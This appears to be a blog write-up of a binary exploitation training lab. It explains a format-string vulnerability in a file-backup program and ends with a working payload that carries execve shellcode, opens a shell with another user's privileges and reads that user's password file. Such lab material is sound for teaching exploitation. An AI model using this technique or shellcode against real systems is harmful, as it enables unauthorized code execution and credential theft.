---
layout: post
title: Modern Binary Exploitation - Lab 4A
published: True
---

For this lab, we are given a program and its corresponding source code:

{% highlight C %}
/*
 *   Format String Lab - A Problem
 *   gcc -z execstack -z relro -z now -o lab4A lab4A.c // -z now compiler flag marks the GOT as completely read-only
 *                                                                                                                                      
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#define BACKUP_DIR "./backups/"
#define LOG_FILE "./backups/.log"

void
log_wrapper(FILE *logf, char *msg, char *filename) //msg = "Starting back up: " || "Finied back up " //filename = argv[1]
{
    char log_buf[255];
    strcpy(log_buf, msg); //"Starting back up: "
    snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1/*NULL*/, filename);  
    //"Starting back up: %x%x%x%x" 
    log_buf[strcspn(log_buf, "\n")] = '\0';
    fprintf(logf, "LOG: %s\n", log_buf);
}

int
main(int argc, char *argv[])
{
    char ch = EOF;
    char dest_buf[100];
    FILE *source, *logf;
    int target = -1;

    if (argc != 2) {
        printf("Usage: %s filename\n", argv[0]);
    }

    // Open log file
    logf = fopen(LOG_FILE, "w");
    if (logf == NULL) {
        printf("ERROR: Failed to open %s\n", LOG_FILE);
        exit(EXIT_FAILURE);
    }

    log_wrapper(logf, "Starting back up: ", argv[1]);

    // Open source
    source = fopen(argv[1], "r");
    if (source == NULL) {
        printf("ERROR: Failed to open %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    // Open dest
    strcpy(dest_buf, BACKUP_DIR);
    strncat(dest_buf, argv[1], 100-strlen(dest_buf)-1/*NULL*/);
    target = open(dest_buf, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR);
    if (target < 0) {
        printf("ERROR: Failed to open %s%s\n", BACKUP_DIR, argv[1]);
        exit(EXIT_FAILURE);
    }

    // Copy data
    while( ( ch = fgetc(source) ) != EOF)
        write(target, &ch, 1);

    log_wrapper(logf, "Finished back up ", argv[1]);

    // Clean up
    fclose(source);
    close(target);

    return EXIT_SUCCESS;
}
{% endhighlight %}

The program takes a file in the current directory and backs it up. To get the program working, we must create a `backups` folder in the current working directory and add a `.log` file to it.

Running `chekcsec` on the binary gives us the following results.
{% highlight bash %}
gdb-peda$ checksec                                                                                                                          
CANARY    : ENABLED
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : FULL
{% endhighlight %}

Because the program is compiled with the `-z relro` and `-z now` flags, full RELRO is enabled. Therefore we can neither overwrite the **GOT** nor the **dtors** section.
Additionally, there is a stack canary which prevents us from performing a traditional stack overflow to corrupt the saved return address.

## Vulnerability

A format string vulnerability is introduced in the `snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1/*NULL*/, filename);` call in the `void log_wrapper()` function. 
The filename of the backup is never validated before being passed into the `snprintf()` call, where it is parsed and written to an offset into the `log_buf` array.
The final result of `log_buf` is later printed to the `/backups/.log` file.

We can exploit this vulnerability by overwriting the saved return address so that when `log_wrapper()` finishes, the program instead of returning back to `main()`, jumps to the location of our shellcode on the stack.

Using **fixenv** and **gdb** with `peda.py` sourced, we can also see that the **SRA** exists at address `0xbffff6ac` 

{% highlight bash %}
0316| 0xbffff6ac --> 0x8048a8b (<main+171>:	mov    eax,DWORD PTR [esp+0xc])
{% endhighlight %}

So we will want to perform 2 controlled writes to overwrite the lower 2 bytes starting at `0xbffff6ac` and the 2 bytes starting at `0xbffff6ae`.

We can also determine that jumping to address `0xbffff934` will take us safely to the middle of our NOP sled before our ***execve("/bin/sh")*** shellcode.

{% highlight bash %}
gdb-peda$ find "0x90909090909090909090" all

[...]

   [stack] : 0xbffff931 --> 0x90909090 
   [stack] : 0xbffff954 --> 0x90909090 
   [stack] : 0xbffff95e --> 0x90909090 
   [stack] : 0xbffff968 --> 0x90909090 
   [stack] : 0xbffff972 --> 0x90909090 
{% endhighlight %}

After performing some calculations, we determine that a width of `%63703x` with `%n` will write `0xf6ac` to `0xbffff6ac` and a width of `%50891x` with `%n` will write `0xbfff` to `0xbffff6ae`. 
As an aside, I could have also used the `%hn` format specifier with different widths to write the same values to those addresses. 

Putting everything together, the following input will give us a shell.

## Solution
{% highlight bash %}
lab4A@warzone:/tmp/lab4A$ fixenv /levels/lab04/lab4A $(python -c 'print "B"+"\xac\xf6\xff\xbf"+"BBBB"+"\xae\xf6\xff\xbf"+"%x"*12+"%63703x%n"+"%50891x%n"+"\x90"*10+"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x90"*45')
$ id
uid=1016(lab4A) gid=1017(lab4A) euid=1017(lab4end) groups=1018(lab4end),1001(gameuser),1017(lab4A)
$ cat /home/lab4end/.pass 
1t_w4s_ju5t_4_w4rn1ng
{% endhighlight %}
